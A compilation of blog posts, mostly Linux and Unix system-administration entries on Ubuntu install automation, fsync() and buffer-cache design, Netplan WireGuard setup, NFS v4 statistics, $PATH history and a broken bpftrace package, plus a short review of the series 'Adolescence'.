Alas, I am not expecting many bugs to be fixed. It is, after all, nearly April, which means there are just two months until WWDC and the first semi-public builds of another new MacOS version. I am hesitant every year to upgrade. But it does not appear much effort is being put into the maintenance of any previous version. We all get the choice of many familiar bugs, or a blend of hopefully fewer old bugs plus some new ones.

⌥ Permalink

‘Adolescence’

By: Nick Heer

Lucy Mangan, the Guardian:

There have been a few contenders for the crown [of “televisual perfection”] over the years, but none has come as close as Jack Thorne’s and Stephen Graham’s astonishing four-part series Adolescence, whose technical accomplishments – each episode is done in a single take – are matched by an array of award-worthy performances and a script that manages to be intensely naturalistic and hugely evocative at the same time. Adolescence is a deeply moving, deeply harrowing experience.

I did not intend on watching the whole four-part series today, maybe just the first and second episodes. But I could not turn away. The effectively unanimous praise for this is absolutely earned.

The oner format sounds like it could be a gimmick, the kind of thing that screams a bit too loud and overshadows what should be a tender and difficult narrative. Nothing could be further from the truth. The technical decisions force specific storytelling decisions, in the same way that a more maximalist production in the style of, say, David Fincher does. Fincher would shoot fifty versions of everything and then assemble the best performances into a tight machine — and I love that stuff. But I love this, too, little errors and all. It is better for these choices. The dialogue cannot get just a little bit tighter in the edit, or whatever. It is all just there.

I know nothing about reviewing television or movies but, so far as I can tell, everyone involved has pulled this off spectacularly. You can quibble with things like the rainbow party-like explanation of different emoji — something for which I cannot find any evidence — that has now become its own moral panic. I get that. Even so, this is one of the greatest storytelling achievements I have seen in years.

Update: Watch it on Netflix. See? The ability to edit means I can get away with not fully thinking this post through.

⌥ Permalink

How we handle debconf questions during our Ubuntu installs

By: cks

In a comment on How we automate installing extra packages during Ubuntu installs, David Magda asked how we dealt with the things that need debconf answers. This is a good question and we have two approaches that we use in combination. First, we have a prepared file of debconf selections for each Ubuntu version and we feed this into debconf-set-selections before we start installing packages. However in practice this file doesn't have much in it and we rarely remember to update it (and as a result, a bunch of it is somewhat obsolete). We generally only update this file if we discover debconf selections where the default doesn't work in our environment.

Second, we run apt-get with a bunch of environment variables set to muzzle debconf:

export DEBCONF_TERSE=yes
export DEBCONF_NOWARNINGS=yes
export DEBCONF_ADMIN_EMAIL=<null address>@<our domain>
export DEBIAN_FRONTEND=noninteractive

Traditionally I've considered muzzling debconf this way to be too dangerous to do during package updates or installing packages by hand. However, I consider it not so much safe as safe enough to do this during our standard install process. To put it one way, we're not starting out with a working system and potentially breaking it by letting some new or updated package pick bad defaults. Instead we're starting with a non-working system and hopefully ending up with a working one. If some package picks bad defaults and we wind up with problems, that's not much worse than we started out with and we'll fix it by updating our file of debconf selections and then redoing the install.

Also, in practice all of this gets worked out during our initial test installs of any new Ubuntu version (done on test virtual machines these days). By the time we're ready to start installing real servers with a new Ubuntu version, we've gone through most of the discovery process for debconf questions. Then the only time we're going to have problems during future system installs future is if a package update either changes the default answer for a current question (to a bad one) or adds a new question with a bad default. As far as I can remember, we haven't had either happen.

(Some of our servers need additional packages installed, which we do by hand (as mentioned), and sometimes the packages will insist on stopping to ask us questions or give us warnings. This is annoying, but so far not annoying enough to fix it by augmenting our standard debconf selections to deal with it.)

The pragmatics of doing fsync() after a re-open() of journals and logs

By: cks

Recently I read Rob Norris' fsync() after open() is an elaborate no-op (via). This is a contrarian reaction to the CouchDB article that prompted my entry Always sync your log or journal files when you open them. At one level I can't disagree with Norris and the article; POSIX is indeed very limited about the guarantees it provides for a successful fsync() in a way that frustrates the 'fsync after open' case.

At another level, I disagree with the article. As Norris notes, there are systems that go beyond the minimum POSIX guarantees, and also the fsync() after open() approach is almost the best you can do and is much faster than your other (portable) option, which is to call sync() (on Linux you could call syncfs() instead). Under POSIX, sync() is allowed to return before the IO is complete, but at least sync() is supposed to definitely trigger flushing any unwritten data to disk, which is more than POSIX fsync() provides you (as Norris notes, POSIX permits fsync() to apply only to data written to that file descriptor, not all unwritten data for the underlying file). As far as fsync() goes, in practice I believe that almost all Unixes and Unix filesystems are going to be more generous than POSIX requires and fsync() all dirty data for a file, not just data written through your file descriptor.

Actually being as restrictive as POSIX allows would likely be a problem for Unix kernels. The kernel wants to index the filesystem cache by inode, including unwritten data. This makes it natural for fsync() to flush all unwritten data associated with the file regardless of who wrote it, because then the kernel needs no extra data to be attached to dirty buffers. If you wanted to be able to flush only dirty data associated with a file object or file descriptor, you'd need to either add metadata associated with dirty buffers or index the filesystem cache differently (which is clearly less natural and probably less efficient).

Adding metadata has an assortment of challenges and overheads. If you add it to dirty buffers themselves, you have to worry about clearing this metadata when a file descriptor is closed or a file object is deallocated (including when the process exits). If you instead attach metadata about dirty buffers to file descriptors or file objects, there's a variety of situations where other IO involving the buffer requires updating your metadata, including the kernel writing out dirty buffers on its own without a fsync() or a sync() and then perhaps deallocating the now clean buffer to free up memory.

Being as restrictive as POSIX allows probably also has low benefits in practice. To be a clear benefit, you would need to have multiple things writing significant amounts of data to the same file and fsync()'ing their data separately; this is when the file descriptor (or file object) specific fsync() saves you a bunch of data write traffic over the 'fsync() the entire file' approach. But as far as I know, this is a pretty unusual IO pattern. Much of the time, the thing fsync()'ing the file is the only writer, either because it's the only thing dealing with the file or because updates to the file are being coordinated through it so that processes don't step over each other.

PS: If you wanted to implement this, the simplest option would be to store the file descriptor and PID (as numbers) as additional metadata with each buffer. When the system fsync()'d a file, it could check the current file descriptor number and PID against the saved ones and only flush buffers where they matched, or where these values had been cleared to signal an uncertain owner. This would flush more than strictly necessary if the file descriptor number (or the process ID) had been reused or buffers had been touched in some way that caused the kernel to clear the metadata, but doing more work than POSIX strictly requires is relatively harmless.

Sidebar: fsync() and mmap() in POSIX

Under a strict reading of the POSIX fsync() specification, it's not entirely clear how you're properly supposed to fsync() data written through mmap() mappings. If 'all data for the open file descriptor' includes pages touched through mmap(), then you have to keep the file descriptor you used for mmap() open, despite POSIX mmap() otherwise implicitly allowing you to close it; my view is that this is at least surprising. If 'all data' only includes data directly written through the file descriptor with system calls, then there's no way to trigger a fsync() for mmap()'d data.

The obviousness of indexing the Unix filesystem buffer cache by inodes

By: cks

Like most operating systems, Unix has an in-memory cache of filesystem data. Originally this was a fixed size buffer cache that was maintained separately from the memory used by processes, but later it became a unified cache that was used for both memory mappings established through mmap() and regular read() and write() IO (for good reasons). Whenever you have a cache, one of the things you need to decide is how the cache is indexed. The more or less required answer for Unix is that the filesystem cache is indexed by inode (and thus filesystem, as inodes are almost always attached to some filesystem).

Unix has three levels of indirection for straightforward IO. Processes open and deal with file descriptors, which refer to underlying file objects, which in turn refer to an inode. There are various situations, such as calling dup(), where you will wind up with two file descriptors that refer to the same underlying file object. Some state is specific to file descriptors, but other state is held at the level of file objects, and some state has to be held at the inode level, such as the last modification time of the inode. For mmap()'d files, we have a 'virtual memory area', which is a separate level of indirection that is on top of the inode.

The biggest reason to index the filesystem cache by inode instead of file descriptor or file object is coherence. If two processes separately open the same file, getting two separate file objects and two separate file descriptors, and then one process writes to the file while the other reads from it, we want the reading process to see the data that the writing process has written. The only thing the two processes naturally share is the inode of the file, so indexing the filesystem cache by inode is the easiest way to provide coherence. If the kernel indexed by file object or file descriptor, it would have to do extra work to propagate updates through all of the indirection. This includes the 'updates' of reading data off disk; if you index by inode, everyone reading from the file automatically sees fetched data with no extra work.

(Generally we also want this coherence for two processes that both mmap() the file, and for one process that mmap()s the file while another process read()s or write()s to it. Again this is easiest to achieve if everything is indexed by the inode.)

Another reason to index by inode is how easy it is to handle various situations in the filesystem cache when things are closed or removed, especially when the filesystem cache holds writes that are being buffered in memory before being flushed to disk. Processes frequently close file descriptors and drop file objects, including by exiting, but any buffered writes still need to be findable so they can be flushed to disk before, say, the filesystem itself is unmounted. Similarly, if an inode is deleted we don't want to flush its pending buffered writes to disk (and certainly we can't allocate blocks for them, since there's nothing to own those blocks any more), and we want to discard any clean buffers associated with it to free up memory. If you index the cache by inode, all you need is for filesystems to be able to find all their inodes; everything else more or less falls out naturally.

This doesn't absolutely require a Unix to index its filesystem buffer caches by inode. But I think it's clearly easiest to index the filesystem cache by inode, instead of the other available references. The inode is the common point for all IO involving a file (partly because it's what filesystems deal with), which makes it the easiest index; everyone has an inode reference and in a properly implemented Unix, everyone is using the same inode reference.

(In fact all sorts of fun tend to happen in Unixes if they have a filesystem that gives out different in-kernel inodes that all refer to the same on-disk filesystem object. Usually this happens by accident or filesystem bugs.)

How we automate installing extra packages during Ubuntu installs

By: cks

We have a local system for installing Ubuntu machines, and one of the important things it does is install various additional Ubuntu packages that we want as part of our standard installs. These days we have two sorts of standard installs, a 'base' set of packages that everything gets and a broader set of packages that login servers and compute servers get (to make them more useful and usable by people). Specialized machines need additional packages, and while we can automate installation of those too, they're generally a small enough set of packages that we document them in our install instructions for each machine and install them by hand.

There are probably clever ways to do bulk installs of Ubuntu packages, but if so, we don't use them. Our approach is instead a brute force one. We have files that contain lists of packages, such as a 'base' file, and these files just contain a list of packages with optional comments:

# Partial example of Basic package set
amanda-client
curl
jq
[...]

# decodes kernel MCE/machine check events
rasdaemon

# Be able to build Debian (Ubuntu) packages on anything
build-essential fakeroot dpkg-dev devscripts automake 

(Like all of the rest of our configuration information, these package set files live in our central administrative filesystem. You could distribute them in some other way, for example fetching them with rsync or even HTTP.)

To install these packages, we use grep to extract the actual packages into a big list and feed the big list to apt-get. This is more or less:

pkgs=$(cat $PKGDIR/$s | grep -v '^#' | grep -v '^[ \t]*$')
apt-get -qq -y install $pkgs

(This will abort if any of the packages we list aren't available. We consider this a feature, because it means we have an error in the list of packages.)

A more organized and minimal approach might be to add the '--no-install-recommends' option, but we started without it and we don't particularly want to go back to find which recommended packages we'd have to explicitly add to our package lists.

At least some of the 'base' package installs could be done during the initial system install process from our customized Ubuntu server ISO image, since you can specify additional packages to install. However, doing package installs that way would create a series of issues in practice. We'd probably need to more carefully track which package came from which Ubuntu collection, since only some of them are enabled during the server install process, it would be harder to update the lists, and the tools for handling the whole process would be a lot more limited, as would our ability to troubleshoot any problems.

Doing this additional package install in our 'postinstall' process means that we're doing it in a full Unix environment where we have all of the standard Unix tools, and we can easily look around the system if and when there's a problem. Generally we've found that the more of our installs we can defer to once the system is running normally, the better.

(Also, the less the Ubuntu installer does, the faster it finishes and the sooner we can get back to our desks.)

(This entry was inspired by parts of a blog post I read recently and reflecting about how we've made setting up new versions of machines pretty easy, assuming our core infrastructure is there.)

The mystery (to me) of tiny font sizes in KDE programs I run

By: cks

Over on the Fediverse I tried a KDE program and ran into a common issue for me:

It has been '0' days since a KDE app started up with too-small fonts on my bespoke fvwm based desktop, and had no text zoom. I guess I will go use a browser, at least I can zoom fonts there.

Maybe I could find a KDE settings thing and maybe find where and why KDE does this (it doesn't happen in GNOME apps), but honestly it's simpler to give up on KDE based programs and find other choices.

(The specific KDE program I was trying to use this time was NeoChat.)

My fvwm based desktop environment has an XSettings daemon running, which I use in part to set up a proper HiDPI environment (also, which doesn't talk about KDE fonts because I never figured that out). I suspect that my HiDPI display is part of why KDE programs often or always seem to pick tiny fonts, but I don't particularly know why. Based on the xsettingsd documentation and the registry, there doesn't seem to be any KDE specific font settings, and I'm setting the Gtk/FontName setting to a font that KDE doesn't seem to be using (which I could only verify once I found a way to see the font I was specifying).

After some searching I found the systemsettings program through the Arch wiki's page on KDE and was able to turn up its font sizes in a way that appears to be durable (ie, it stays after I stop and start systemsettings). However, this hasn't affected the fonts I see in NeoChat when I run it again. There are a bunch of font settings, but maybe NeoChat is using the 'small' font for some reason (apparently which app uses what font setting can be variable).

QT (the underlying GUI toolkit of much or all of KDE) has its own set of environment variables for scaling things on HiDPI displays, and setting $QT_SCALE_FACTOR does size up NeoChat (although apparently bits of Plasma ignore these, although I think I'm unlikely to run into this since I don't want to use KDE's desktop components).

Some KDE applications have their own settings files with their own font sizes; one example I know if is kdiff3. This is quite helpful because if I'm determined enough, I can either adjust the font sizes in the program's settings or at least go edit the configuration file (in this case, .config/kdiff3rc, I think, not .kde/share/config/kdiff3rc). However, not all KDE applications allow you to change font sizes through either their GUI or a settings file, and NeoChat appears to be one of the ones that don't.

In theory now that I've done all of this research I could resize NeoChat and perhaps other KDE applications through $QT_SCALE_FACTOR. In practice I feel I would rather switch to applications that interoperate better with the rest of my environment unless for some reason the KDE application is either my only choice or the significantly superior one (as it has been so far for kdiff3 for my usage).

Using Netplan to set up WireGuard on Ubuntu 22.04 works, but has warts

By: cks

For reasons outside the scope of this entry, I recently needed to set up WireGuard on an Ubuntu 22.04 machine. When I did this before for an IPv6 gateway, I used systemd-networkd directly. This time around I wasn't going to set up a single peer and stop; I expected to iterate and add peers several times, which made netplan's ability to update and re-do your network configuration look attractive. Also, our machines are already using Netplan for their basic network configuration, so this would spare my co-workers from having to learn about systemd-networkd.

Conveniently, Netplan supports multiple configuration files so you can put your WireGuard configuration into a new .yaml file in your /etc/netplan. The basic version of a WireGuard endpoint with purely internal WireGuard IPs is straightforward:

network:
  version: 2
  tunnels:
    our-wg0:
      mode: wireguard
      addresses: [ 192.168.X.1/24 ]
      port: 51820
      key:
        private: '....'
      peers:
        - keys:
            public: '....'
          allowed-ips: [ 192.168.X.10/32 ]
          keepalive: 90
          endpoint: A.B.C.D:51820

(You may want something larger than a /24 depending on how many other machines you think you'll be talking to. Also, this configuration doesn't enable IP forwarding, which is a feature in our particular situation.)

If you're using netplan's systemd-networkd backend, which you probably are on an Ubuntu server, you can apparently put your keys into files instead of needing to carefully guard the permissions of your WireGuard /etc/netplan file (which normally has your private key in it).

If you write this out and run 'netplan try' or 'netplan apply', it will duly apply all of the configuration and bring your 'our-wg0' WireGuard configuration up as you expect. The problems emerge when you change this configuration, perhaps to add another peer, and then re-do your 'netplan try', because when you look you'll find that your new peer hasn't been added. This is a sign of a general issue; as far as I can tell, netplan (at least in Ubuntu 22.04) can set up WireGuard devices from scratch but it can't update anything about their WireGuard configuration once they're created. This is probably be a limitation in the Ubuntu 22.04 version of systemd-networkd that's only changed in the very latest systemd versions. In order to make WireGuard level changes, you need to remove the device, for example with 'ip link del dev our-wg0' and then re-run 'netplan try' (or 'netplan apply') to re-create the WireGuard device from scratch; the recreated version will include all of your changes.

(The latest online systemd.netdev manual page says that systemd-networkd will try to update netdev configurations if they change, and .netdev files are where WireGuard settings go. The best information I can find is that this change appeared in systemd v257, although the Fedora 41 systemd.netdev manual page has this same wording and it has systemd '256.11'. Maybe there was a backport into Fedora.)

In our specific situation, deleting and recreating the WireGuard device is harmless and we're not going to be doing it very often anyway. In other configurations things may not be so straightforward and so you may need to resort to other means to apply updates to your WireGuard configuration (including working directly through the 'wg' tool).

I'm not impressed by the state of NFS v4 in the Linux kernel

By: cks

Although NFS v4 is (in theory) the latest great thing in NFS protocol versions, for a long time we only used NFS v3 for our fileservers and our Ubuntu NFS clients. A few years ago we switched to NFS v4 due to running into a series of problems our people were experiencing with NFS (v3) locks (cf); since NFS v4 locks are integrated into the protocol and NFS v4 is the 'modern' NFS version that's probably receiving more attention than anything to do with NFS v3.

(NFS v4 locks are handled relatively differently than NFS v3 locks.)

Moving to NFS v4 did fix our NFS lock issues in that stuck NFS locks went away, when before they'd been a regular issue on our IMAP server. However, all has not turned out to be roses, and the result has left me not really impressed with the state of NFS v4 in the Linux kernel. In Ubuntu 22.04's 5.15.x server kernel, we've now run into scalability issues in both the NFS server (which is what sparked our interest in how many NFS server threads to run and what NFS server threads do in the kernel), and now in the NFS v4 client (where I have notes that let me point to a specific commit with the fix).

(The NFS v4 server issue we encountered may be the one fixed by this commit.)

What our two issues have in common is that both are things that you only find under decent or even significant load. That these issues both seem to have still been present as late as kernels 6.1 (server) and 6.6 (client) suggests that neither the Linux NFS v4 server nor the Linux NFS v4 client had been put under serious load until then, or at least not by people who could diagnose their problems precisely enough to identify the problem and get kernel fixes made. While both issues are probably fixed now, their past presence leaves me wondering what other scalability issues are lurking in the kernel's NFS v4 support, partly because people have mostly been using NFS v3 until recently (like us).

We're not going to go back to NFS v3 in general (partly because of the clear improvement in locking), and the server problem we know about has been wiped away because we're moving our NFS fileservers to Ubuntu 24.04 (and some day the NFS clients will move as well). But I'm braced for further problems, including ones in 24.04 that we may be stuck with for a while.

PS: I suspect that part of the issues may come about because the Linux NFS v4 client and the Linux NFS v4 server don't add NFS v4 operations at the same time. As I found out, the server supports more operations than the client uses but the client's use is of whatever is convenient and useful for it, not necessarily by NFS v4 revision. If the major use of Linux NFS v4 servers is with v4 clients, this could leave the server implementation of operations under-used until the client starts using them (and people upgrade clients to kernel versions with that support).

Why I have a little C program to filter a $PATH (more or less)

By: cks

I use a non-standard shell and have for a long time, which means that I have to write and maintain my own set of dotfiles (which sometimes has advantages). In the long ago days when I started doing this, I had a bunch of accounts on different Unixes around the university (as was the fashion at the time, especially if you were a sysadmin). So I decided that I was going to simplify my life by having one set of dotfiles for rc that I used on all of my accounts, across a wide variety of Unixes and Unix environments. That way, when I made an improvement in a shell function I used, I could get it everywhere by just pushing out a new version of my dotfiles.

(This was long enough ago that my dotfile propagation was mostly manual, although I believe I used rdist for some of it.)

In the old days, one of the problems you faced if you wanted a common set of dotfiles across a wide variety of Unixes was that there were a lot of things that potentially could be in your $PATH. Different Unixes had different sets of standard directories, and local groups put local programs (that I definitely wanted access to) in different places. I could have put everything in $PATH (giving me a gigantic one) or tried to carefully scope out what system environment I was on and set an appropriate $PATH for each one, but I decided to take a more brute force approach. I started with a giant potential $PATH that listed every last directory that could appear in $PATH in any system I had an account on, and then I had a C program that filtered that potential $PATH down to only things that existed on the local system. Because it was written in C and had to stat() things anyways, I made it also keep track of what concrete directories it had seen and filter out duplicates, so that if there were symlinks from one name to another, I wouldn't get it twice in my $PATH.

(Looking at historical copies of the source code for this program, the filtering of duplicates was added a bit later; the very first version only cared about whether a directory existed or not.)

The reason I wrote a C program for this (imaginatively called 'isdirs') instead of using shell builtins to do this filtering (which is entirely possible) is primarily because this was so long ago that running a C program was definitely faster than using shell builtins in my shell. I did have a fallback shell builtin version in case my C program might not be compiled for the current system and architecture, although it didn't do the filtering of duplicates.

(Rc uses a real list for its equivalent of $PATH instead of the awkward ':' separated pseudo-list that other Unix shells use, so both my C program and my shell builtin could simply take a conventional argument list of directories rather than having to try to crack a $PATH apart.)

(This entry was inspired by Ben Zanin's trick(s) to filter out duplicate $PATH entries (also), which prompted me to mention my program.)

PS: rc technically only has one dotfile, .rcrc, but I split my version up into several files that did different parts of the work. One reason for this split was so that I could source only some parts to set up my environment in a non-interactive context (also).

Sidebar: the rc builtin version

Rc has very few builtins and those builtins don't include test, so this is a bit convoluted:

path=`{tpath=() pe=() {
        for (pe in $path)
           builtin cd $pe >[1=] >[2=] && tpath=($tpath $pe)
        echo $tpath
       } >[2]/dev/null}

In a conventional shell with a test builtin, you would just use 'test -d' to see if directories were there. In rc, the only builtin that will tell you if a directory exists is to try to cd to it. That we change directories is harmless because everything is running inside the equivalent of a Bourne shell $(...).

Keen eyed people will have noticed that this version doesn't work if anything in $path has a space in it, because we pass the result back as a whitespace-separated string. This is a limitation shared with how I used the C program, but I never had to use a Unix where one of my $PATH entries needed a space in it.

The profusion of things that could be in your $PATH on old Unixes

By: cks

In the beginning, which is to say the early days of Bell Labs Research Unix, life was simple and there was only /bin. Soon afterwards that disk ran out of space and we got /usr/bin (and all of /usr), and some people might even have put /etc on their $PATH. When UCB released BSD Unix, they added /usr/ucb as a place for (some of) their new programs and put some more useful programs in /etc (and at some point there was also /usr/etc); now you had three or four $PATH entries. When window systems showed up, people gave them their own directories too, such as /usr/bin/X11 or /usr/openwin/bin, and this pattern was followed by other third party collections of programs, with (for example) /usr/bin/mh holding all of the (N)MH programs (if you installed them there). A bit later, SunOS 4.0 added /sbin and /usr/sbin and other Unixes soon copied them, adding yet more potential $PATH entries.

(Sometimes X11 wound up in /usr/X11/bin, or /usr/X11<release>/bin. OpenBSD still has a /usr/X11R6 directory tree, to my surprise.)

When Unix went out into the field, early system administrators soon learned that they didn't want to put local programs into /usr/bin, /usr/sbin, and so on. Of course there was no particular agreement on where to put things, so people came up with all sorts of options for the local hierarchy, including /usr/local, /local, /slocal, /<group name> (such as /csri or /dgp), and more. Often these /local/bin things had additional subdirectories for things like the locally built version of X11, which might be plain 'bin/X11' or have a version suffix, like 'bin/X11R4', 'bin/X11R5', or 'bin/X11R6'. Some places got more elaborate; rather than putting everything in a single hierarchy, they put separate things into separate directory hierarchies. When people used /opt for this, you could get /opt/gnu/bin, /opt/tk/bin, and so on.

(There were lots of variations, especially for locally built versions of X11. And a lot of people built X11 from source in those days, at least in the university circles I was in.)

Unix vendors didn't sit still either. As they began adding more optional pieces they started splitting them up into various directory trees, both for their own software and for third party software they felt like shipping. Third party software was often planted into either /usr/local or /usr/contrib, although there were other options, and vendor stuff could go in many places. A typical example is Solaris 9's $PATH for sysadmins (and I think that's not even fully complete, since I believe Solaris 9 had some stuff hiding under /usr/xpg4). Energetic Unix vendors could and did put various things in /opt under various names. By this point, commercial software vendors that shipped things for Unixes also often put them in /opt.

This led to three broad things for people using Unixes back in those days. First, you invariably had a large $PATH, between all of the standard locations, the vendor additions, and the local additions on top of those (and possibly personal 'bin' directories in your $HOME). Second, there was a lot of variation in the $PATH you wanted, both from Unix to Unix (with every vendor having their own collection of non-standard $PATH additions) and from site to site (with sysadmins making all sorts of decisions about where to put local things). Third, setting yourself up on a new Unix often required a bunch of exploration and digging. Unix vendors often didn't add everything that you wanted to their standard $PATH, for example. If you were lucky and got an account at a well run site, their local custom new account dotfiles would set you up with a correct and reasonably complete local $PATH. If you were a sysadmin exploring a new to you Unix, you might wind up writing a grumpy blog entry.

(This got much more complicated for sites that had a multi-Unix environment, especially with shared home directories.)

Modern Unix life is usually at least somewhat better. On Linux, you're typically down to two main directories (/usr/bin and /usr/sbin) and possibly some things in /opt, depending on local tastes. The *BSDs are a little more expansive but typically nowhere near the heights of, for example, Solaris 9's $PATH (see the comments on that entry too).

The Prometheus host agent is missing some Linux NFSv4 RPC stats (as of 1.8.2)

By: cks

Over on the Fediverse I said:

This is my face when the Prometheus host agent provides very incomplete monitoring of NFS v4 RPC operations on modern kernels that can likely hide problems. For NFS servers I believe that you get only NFS v4.0 ops, no NFS v4.1 or v4.2 ones. For NFS v4 clients things confuse me but you certainly don't get all of the stats as far as I can see.

When I wrote that Fediverse post, I hadn't peered far enough into the depths of the Linux kernel to be sure what was missing, but now that I understand the Linux kernel NFS v4 server and client RPC operations stats I can provide a better answer of what's missing. All of this applies to node_exporter as of version 1.8.2 (the current one as I write this).

(I now think 'very incomplete' is somewhat wrong, but not entirely so, especially on the server side.)

Importantly, what's missing is different for the server side and the client side, with the client side providing information on operations that the server side doesn't. This can make it very puzzling if you're trying to cross-compare two 'NFS RPC operations' graphs, one from a client and one from a server, because the client graph will show operations that the server graph doesn't.

In the host agent code, the actual stats are read from /proc/net/rpc/nfs and /proc/net/rpc/nfsd by a separate package, prometheus/procfs, and are parsed in nfs/parse.go. For the server case, if we cross compare this to the kernel's include/linux/nfs4.h, what's missing from server stats is all NFS v4.1, v4.2, and RFC 8276 xattr operations, everything from operation 40 through operation 75 (as I write this).

Because the Linux NFS v4 client stats are more confusing and aren't so nicely ordered, the picture there is more complex. The nfs/parse.go code handles everything up through 'Clone', and is missing from 'Copy' onward. However, both what it has and what it's missing are a mixture of NFS v4, v4.1, and v4.2 operations; for example, 'Allocate' and 'Clone' (both included) are v4.2 operations, while 'Lookupp', a v4.0 operation, is missing from client stats. If I'm reading the code correctly, the missing NFS v4 client operations are currently (using somewhat unofficial names):

Copy OffloadCancel Lookupp LayoutError CopyNotify Getxattr Setxattr Listxattrs Removexattr ReadPlus

Adding the missing operations to the Prometheus host agent would require updates to both prometheus/procfs (to add fields for them) and to node_exporter itself, to report the fields. The NFS client stats collector in collector/nfs_linux.go uses Go reflection to determine the metrics to report and so needs no updates, but the NFS server stats collector in collector/nfsd_linux.go directly knows about all 40 of the current operations and so would need code updates, either to add the new fields or to switch to using Go reflection.

If you want numbers for scale, at the moment node_exporter reports on 50 out of 69 NFS v4 client operations, and is missing 36 NFS v4 server operations (reporting on what I believe is 36 out of 72). My ability to decode what the kernel NFS v4 client and server code is doing is limited, so I can't say exactly how these operations match up and, for example, what client operations the server stats are missing.

(I haven't made a bug report about this (yet) and may not do so, because doing so would require making my Github account operable again, something I'm sort of annoyed by. Github's choice to require me to have MFA to make bug reports is not the incentive they think it is.)

Linux kernel NFSv4 server and client RPC operation statistics

By: cks

NFS servers and clients communicate using RPC, sending various NFS v3, v4, and possibly v2 (but we hope not) RPC operations to the server and getting replies. On Linux, the kernel exports statistics about these NFS RPC operations in various places, with a global summary in /proc/net/rpc/nfsd (for the NFS server side) and /proc/net/rpc/nfs (for the client side). Various tools will extract this information and convert it into things like metrics, or present it on the fly (for example, nfsstat(8)). However, as far as I know what is in those files and especially how RPC operations are reported is not well documented, and also confusing, which is a problem if you discover that something has an incomplete knowledge of NFSv4 RPC stats.

For a general discussion of /proc/net/rpc/nfsd, see Svenn D'Hert's nfsd stats explained article. I'm focusing on NFSv4, which is to say the 'proc4ops' line. This line is produced in nfsd_show in fs/nfsd/stats.c. The line starts with a count of how many operations there are, such as 'proc4ops 76', and then has one number for each operation. What are the operations and how many of them are there? That's more or less found in the nfs_opnum4 enum in include/linux/nfs4.h. You'll notice that there are some gaps in the operation numbers; for example, there's no 0, 1, or 2. Despite there being no such actual NFS v4 operations, 'proc4ops' starts with three 0s for them, because it works with an array numbered by nfs_opnum4 and like all C arrays, it starts at 0.

(The counts of other, real NFS v4 operations may be 0 because they're never done in your environment.)

For NFS v4 client operations, we look at the 'proc4' line in /proc/net/rpc/nfs. Like the server's 'proc4ops' line, it starts with a count of how many operations are being reported on, such as 'proc4 69', and then a count for each operation. Unfortunately for us and everyone else, these operations are not numbered the same as the NFS server operations. Instead the numbering is given in an anonymous and unnumbered enum in include/linux/nfs4.h that starts with 'NFSPROC4_CLNT_NULL = 0,' (as a spoiler, the 'null' operation is not unused, contrary to the include file's comment). The actual generation and output of /proc/net/rpc/nfs is done in rpc_proc_show in net/sunrpc/stats.c. The whole structure this code uses is set up in fs/nfs/nfs4xdr.c, and while there is a confusing level of indirection, I believe the structure corresponds directly with the NFSPROC4_CLNT_* enum values.

What I think is going on is that Linux has decided to optimize its NFSv4 client statistics to only include the NFS v4 operations that it actually uses, rather than take up a bit of extra memory to include all of the NFS v4 operations, including ones that will always have a '0' count. Because the Linux NFS v4 client started using different NFSv4 operations at different times, some of these operations (such as 'lookupp') are out of order; when the NFS v4 client started using them, they had to be added at the end of the 'proc4' line to preserve backward compatibility with existing programs that read /proc/net/rpc/nfs.

PS: As far as I can tell from a quick look at fs/nfs/nfs3xdr.c, include/uapi/linux/nfs3.h, and net/sunrpc/stats.c, the NFS v3 server and client stats cover all of the NFS v3 operations and are in the same order, the order of the NFS v3 operation numbers.

How Ubuntu 24.04's bad bpftrace package appears to have happened

By: cks

When I wrote about Ubuntu 24.04's completely broken bpftrace '0.20.2-1ubuntu4.2' package (which is now no longer available as an Ubuntu update), I said it was a disturbing mystery how a theoretical 24.04 bpftrace binary was built in such a way that it depended on a shared library that didn't exist in 24.04. Thanks to the discussion in bpftrace bug #2097317, we have somewhat of an answer, which in part shows some of the challenges of building software at scale.

The short version is that the broken bpftrace package wasn't built in a standard Ubuntu 24.04 environment that only had released packages. Instead, it was built in a '24.04' environment that included (some?) proposed updates, and one of the included proposed updates was an updated version of libllvm18 that had the new shared library. Apparently there are mechanisms that should have acted to make the new bpftrace depend on the new libllvm18 if everything went right, but some things didn't go right and the new bpftrace package didn't pick up that dependency.

On the one hand, if you're planning interconnected package updates, it's a good idea to make sure that they work with each other, which means you may want to mingle in some proposed updates into some of your build environments. On the other hand, if you allow your build environments to be contaminated with non-public packages this way, you really, really need to make sure that the dependencies work out. If you don't and packages become public in the wrong order, you get Ubuntu 24.04's result.

(While the RPM build process and package format would have avoided this specific problem, I'm pretty sure that there are similar ways to make it go wrong.)

Contaminating your build environment this way also makes testing your newly built packages harder. The built bpftrace binary would have run inside the build environment, because the build environment had the right shared library from the proposed libllvm18. To see the failure, you would have to run tests (including running the built binary) in a 'pure' 24.04 environment that had only publicly released package updates. This would require an extra package test step; I'm not clear if Ubuntu has this as part of their automated testing of proposed updates (there's some hints in the discussion that they do but that these tests were limited and didn't try to run the binary).

An alarmingly bad official Ubuntu 24.04 bpftrace binary package

By: cks

Bpftrace is a more or less official part of Ubuntu; it's even in the Ubuntu 24.04 'main' repository, as opposed to one of the less supported ones. So I'll present things in the traditional illustrated form (slightly edited for line length reasons):

$ bpftrace
bpftrace: error while loading shared libraries: libLLVM-18.so.18.1: cannot open shared object file: No such file or directory
$ readelf -d /usr/bin/bpftrace | grep libLLVM
 0x0...01 (NEEDED)  Shared library: [libLLVM-18.so.18.1]
$ dpkg -L libllvm18 | grep libLLVM
/usr/lib/llvm-18/lib/libLLVM.so.1
/usr/lib/llvm-18/lib/libLLVM.so.18.1
/usr/lib/x86_64-linux-gnu/libLLVM-18.so
/usr/lib/x86_64-linux-gnu/libLLVM.so.18.1
$ dpkg -l bpftrace libllvm18
[...]
ii  bpftrace       0.20.2-1ubuntu4.2 amd64 [...]
ii  libllvm18:amd64 1:18.1.3-1ubuntu1 amd64 [...]

I originally mis-diagnosed this as a libllvm18 packaging failure, but this is in fact worse. Based on trawling through packages.ubuntu.com, only Ubuntu 24.10 and later have a 'libLLVM-18.so.18.1' in any package; in Ubuntu 24.04, the correct name for this is 'libLLVM.so.18.1'. If you rebuild the bpftrace source .deb on a genuine 24.04 machine, you get a bpftrace build (and binary .deb) that does correctly use 'libLLVM.so.18.1' instead of 'libLLVM-18.so.18.1'.

